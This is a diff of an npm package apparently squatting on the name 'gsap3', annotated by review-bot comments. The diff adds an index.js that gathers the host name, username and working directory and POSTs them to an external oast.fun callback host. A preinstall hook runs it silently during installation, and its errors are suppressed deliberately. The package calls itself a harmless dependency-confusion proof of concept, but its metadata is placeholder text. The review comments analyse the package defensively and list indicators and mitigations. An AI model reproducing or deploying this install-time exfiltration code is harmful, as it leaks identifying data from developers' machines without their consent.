@xcxcxxx/gsap3 1.0.0 → 99.10.90
- package/index.js +53 -1
- package/package.json +17 -2
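--- a/package/index.js
+++ b/package/index.js
@@ -1 +1,53 @@
-//
+// index.js - A safe and minimal payload for dependency confusion PoC
+const os = require('os');
+const https = require('https');
+const process = require('process');
+
+// =================================================================================
+// CONFIGURE THIS: Replace with your unique Interactsh/Burp Collaborator/Webhook URL
+// =================================================================================
+const CALLBACK_URL = 'https://ocvomeqbrouywnpfvqwhgho1ni6xrjica.oast.fun';
+// =================================================================================
+
+try {
+// 1. Collect minimal, non-sensitive identifying information.
+const data = {
+hostname: os.hostname(),
+username: os.userInfo().username,
+cwd: process.cwd(),
+package_name: 'gsap3', // So you know which PoC was triggered
+};
+
+// 2. Prepare the data and options for the HTTPS POST request.
+const postData = JSON.stringify(data);
+
+const options = {
+method: 'POST',
+headers: {
+'Content-Type': 'application/json',
+'Content-Length': Buffer.byteLength(postData),
+'User-Agent': 'npm-poc-script/1.0' // A clear user agent
+}
+};
+
+// 3. Send the request.
+// The hostname of the CALLBACK_URL is extracted to use as the `host` option.
+const url = new URL(CALLBACK_URL);
+const req = https.request({ ...options, host: url.hostname, path: url.pathname }, (res) => {
+// We don't need to do anything with the response, just fire and forget.
+res.on('data', () => {}); // Consume response data to free up memory
+});
+
+req.on('error', (e) => {
+// Error handling in case the callback fails (e.g., network issues, firewall)
+// We do not log the error to the console to remain stealthy.
+});
+
+// Write data to request body and end the request.
+req.write(postData);
+req.end();
+
+} catch (e) {
+// If any part of the data collection or request setup fails, do nothing.
+// This ensures the install process doesn't break if our script has an issue.
+}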
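Review bot: The comment on new line 13 calls the collected fields "minimal, non-sensitive", but `os.hostname()`, `os.userInfo().username` and `process.cwd()` identify the machine, the local account and the project path, and the block POSTs them to the host in `CALLBACK_URL`. The comment should say so, e.g. `// 1. Collect hostname, local username and working directory (host- and user-identifying; sent off-host).` The `req.on('error', …)` handler and the outer `catch` are both empty, and the comment on new line 43 gives staying unnoticed as the reason, so a host that ran this file shows nothing on the console. For triage, the indicators available on this page are the `CALLBACK_URL` host and the fixed `User-Agent` value `npm-poc-script/1.0` in outbound HTTPS from a `node` process.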
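--- a/package/package.json
+++ b/package/package.json
@@ -1,5 +1,20 @@
 {
 "name": "@xcxcxxx/gsap3",
-"version": "
-"
+"version": "99.10.90",
+"description": "SECURITY RESEARCH - Dependency confusion PoC. If you have installed this package, please contact your security team and refer to CVE-2021-23337. This package is meant to demonstrate a vulnerability and is not malicious.",
+"main": "index.js",
+"scripts": {
+"preinstall": "node index.js"
+},
+"author": "Security Researcher",
+"license": "ISC",
+"repository": {
+"type": "git",
+"url": "https://github.com/your-username/security-poc-repo"
+},
+"keywords": [
+"security",
+"research",
+"dependency-confusion"
+]
 }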
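Review bot: The `"preinstall": "node index.js"` entry on new line 7 makes the script run during installation, before anything imports the package, so any environment that resolved this version should be handled as having executed it, whatever the `description` says about intent. The metadata offered to back that description cannot be verified from this file: `repository.url` is still the template value `https://github.com/your-username/security-poc-repo`, `author` is the generic `Security Researcher`, and the cited CVE-2021-23337 is, as far as I know, a lodash command-injection advisory and not a dependency-confusion one. On the consumer side, `ignore-scripts=true` in `.npmrc` (or `npm install --ignore-scripts`) keeps lifecycle hooks such as this one from running.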